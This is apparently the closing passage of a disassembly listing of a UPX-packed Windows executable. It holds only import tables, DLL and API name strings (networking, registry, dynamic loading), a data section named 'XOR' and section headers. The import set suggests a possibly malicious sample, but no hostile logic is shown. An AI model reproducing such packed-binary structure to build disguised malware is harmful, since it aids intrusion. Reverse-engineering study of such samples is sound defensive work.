dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E75CB5h, 0
dd 77DD189Ah, 0
dd 77C1BE00h, 0
aJW db 'jÉÔw',0
align 4
aPV db '¶¯ v',0
align 4
dd 71AB1AF4h, 0
aKernel32_dll db 'KERNEL32.DLL',0
aAdvapi32_dll db 'ADVAPI32.dll',0
aMsvcrt_dll db 'MSVCRT.dll',0
aUser32_dll db 'USER32.dll',0
aWininet_dll db 'WININET.dll',0
aWs2_32_dll db 'WS2_32.dll',0
align 4
aLoadlibrarya db 'LoadLibraryA',0
align 2
aGetprocaddress db 'GetProcAddress',0
align 2
aExitprocess db 'ExitProcess',0
align 4
aRegclosekey db 'RegCloseKey',0
dd 74610000h, 696Fh, 72707377h, 66746E69h, 41h, 65746E49h
dd 74656E72h, 6E65704Fh, 41h, 3A6h dup(0)
UPX2 ends
; Section 4. (virtual address 00009000)
; Virtual size : 00000800 ( 2048.)
; Section size in file : 00000800 ( 2048.)
; Offset to raw data for section: 00009000
; Flags C0000060: Text Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
XOR segment para public 'DATA' use32
assume cs:XOR
;org 31309000h
dd 200h dup(0)
XOR ends
; Section 5. (virtual address 0000A000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00009800
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 3130A000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start